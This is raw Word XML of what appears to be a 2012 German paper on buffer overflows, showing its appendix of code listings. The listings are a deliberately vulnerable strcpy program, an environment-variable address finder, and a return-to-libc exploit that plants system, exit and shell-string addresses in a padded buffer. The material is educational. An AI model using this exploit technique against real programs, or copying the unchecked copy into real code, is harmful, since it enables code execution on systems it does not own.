          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1035" DrawAspect="Content" ObjectID="_1413023297" r:id="rId38"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc339281430"/>
      <w:r>
        <w:t>ExploitMe2.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834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67528</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4229100" cy="1804147"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Textfeld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29100" cy="1804147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ring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*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0]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getchar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>(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strcpy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[1]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1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1" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:13.2pt;width:333pt;height:142.0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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent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ring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*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)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{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0]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getchar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>(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strcpy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[1]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1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513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:p w:rsidR="00513834" w:rsidRPr="00513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:p w:rsidR="00513834" w:rsidRPr="00513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:p w:rsidR="00513834" w:rsidRPr="00513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:p w:rsidR="00513834" w:rsidRPr="00513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7849"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc339281431"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetEnvironmentVarAddr.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834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18619</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4232080" cy="1802891"/>
                <wp:effectExtent l="0" t="0" r="16510" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="22" name="Textfeld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32080" cy="180289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*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addr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getenv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[1]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printf</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>("</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Addres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of</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> %s </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>is</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> %p\n", 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 xml:space="preserve">[1], </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>add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printf</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">("String </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>prese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her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is</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> %s\n", </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>add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1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2" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:9.35pt;width:333.25pt;height:141.9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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent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*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)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{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addr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getenv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[1]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printf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>("</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Addres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of</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> %s </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>is</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> %p\n", 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 xml:space="preserve">[1], </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>addr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>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printf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">("String </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>prese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her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is</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> %s\n", </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>addr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>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1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:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc339281432"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ret2Libc.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834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57606</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4229100" cy="4797299"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="23" name="Textfeld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29100" cy="47972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ring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ystemAddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>[] = "\x60\xe5\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xea</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\xb7"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exitAddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>[] = "\x50\x3b\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xea</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\xb7"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shAddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>[] = "\x50\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xfd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bf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104]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set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, 0x90, 10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, "BUF=", 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 xml:space="preserve">(buffer+88, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>systemAddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>, 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 xml:space="preserve">(buffer+92, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>exitAddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>, 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 xml:space="preserve">(buffer+96, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>bashAddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>, 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emcpy</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>(buffer+100, "\x00\x00\x00\x00", 4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putenv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system</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>(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)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1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834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3" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:12.4pt;width:333pt;height:377.7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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent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ring.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>&gt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ystemAddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>[] = "\x60\xe5\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xea</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\xb7"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exitAddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>[] = "\x50\x3b\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xea</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\xb7"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shAddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>[] = "\x50\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xfd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bf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>"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{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104]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set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, 0x90, 10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, "BUF=", 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 xml:space="preserve">(buffer+88, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>systemAddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, 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 xml:space="preserve">(buffer+92, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>exitAddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, 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 xml:space="preserve">(buffer+96, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>bashAddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, 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emcpy</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>(buffer+100, "\x00\x00\x00\x00", 4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putenv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system</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>(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)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1;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834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513834" w:rsidRPr="00513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:sectPr w:rsidR="00513834" w:rsidRPr="00513834" w:rsidSect="005954C8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1B8" w:rsidRDefault="005641B8" w:rsidP="00FC49EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005641B8" w:rsidRDefault="005641B8" w:rsidP="00FC4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1B8" w:rsidRDefault="005641B8" w:rsidP="00FC49EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005641B8" w:rsidRDefault="005641B8" w:rsidP="00FC49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9EC" w:rsidRDefault="00FC49EC">
    <w:pPr>
      <w:pStyle w:val="Kopfzeile"/>
    </w:pPr>
    <w:r>
      <w:t>Jan Kevin Dick</w:t>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>Buffer</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:t xml:space="preserve"> Overflow</w:t>
    </w:r>
    <w:r>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> TIME \@ "dd.MM.yyyy" </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00621AF0">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>29.10.201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D76365"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBA83D9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D174FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C1C5EF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B0F192C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F08FDD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664CD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE8E695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0E913E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B032161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5F6FA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D21065D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C4B2BCF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C902D01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1B3758A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2512A3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4D36AF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="402AFE5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40B39F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="721E541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46A0DD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9496EA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456576A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77AEE18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11"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="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1B2"/>
    <w:rsid w:val="00031A40"/>
    <w:rsid w:val="00150CB7"/>
    <w:rsid w:val="0029267D"/>
    <w:rsid w:val="004375A6"/>
    <w:rsid w:val="004C01B2"/>
    <w:rsid w:val="004D1933"/>
    <w:rsid w:val="00513834"/>
    <w:rsid w:val="00536AB5"/>
    <w:rsid w:val="005641B8"/>
    <w:rsid w:val="005954C8"/>
    <w:rsid w:val="005C50BF"/>
    <w:rsid w:val="00613FDF"/>
    <w:rsid w:val="00621AF0"/>
    <w:rsid w:val="00660EE9"/>
    <w:rsid w:val="007360E7"/>
    <w:rsid w:val="008B1A26"/>
    <w:rsid w:val="00985FDC"/>
    <w:rsid w:val="00A52A11"/>
    <w:rsid w:val="00B47EE5"/>
    <w:rsid w:val="00BD07B0"/>
    <w:rsid w:val="00C37A61"/>
    <w:rsid w:val="00C73419"/>
    <w:rsid w:val="00E07EC2"/>
    <w:rsid w:val="00FB1D24"/>
    <w:rsid w:val="00FC4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513834"/>
    <w:p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51383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513834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513834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51383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513834"/>
    <w:p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51383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513834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513834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51383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9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oleObject" Target="embeddings/oleObject6.bin"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.emf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oleObject" Target="embeddings/oleObject8.bin"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18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5.bin"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId36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31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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oleObject" Target="embeddings/oleObject7.bin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917478-536C-4123-9906-B0B580D56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99</Words>
  <Characters>6928</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>57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 Kevin Dick</dc:creator>
  <cp:lastModifiedBy>Jan Kevin Dick</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <cp:lastPrinted>2012-10-29T12:41:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-10-15T06:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-10-29T12:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>